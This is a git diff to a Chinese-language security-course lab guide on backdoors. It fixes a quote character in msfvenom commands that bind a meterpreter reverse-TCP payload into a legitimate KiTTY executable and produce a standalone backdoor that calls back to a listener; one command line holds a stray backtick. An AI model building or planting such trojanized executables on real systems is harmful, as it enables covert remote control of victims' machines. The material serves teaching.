diff --git "a/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" "b/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" index ad46c1b8fe151cb9a3ee10a25084d25dc74ef92a..d3b68ce15afd699726e241b7bd8917225570035c 100644 --- "a/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" +++ "b/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" @@ -340,7 +340,7 @@ windows版见[附件](http://git.oschina.net/wildlinux/NetSec/attach_files)。 下面指令中用到的 ./KiTTYPortable.exe 是一个普通的windows可执行文件,被我复制了/home/YL/目录下,后门会被写到这个文件中。我做实验时用的是KiTTYPortable.exe,你可以用其他文件代替。不论用哪个可执行文件都可以,但当然需要复制到linux下了。 ``` -root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe +root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe *** 或者简单点 *** root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe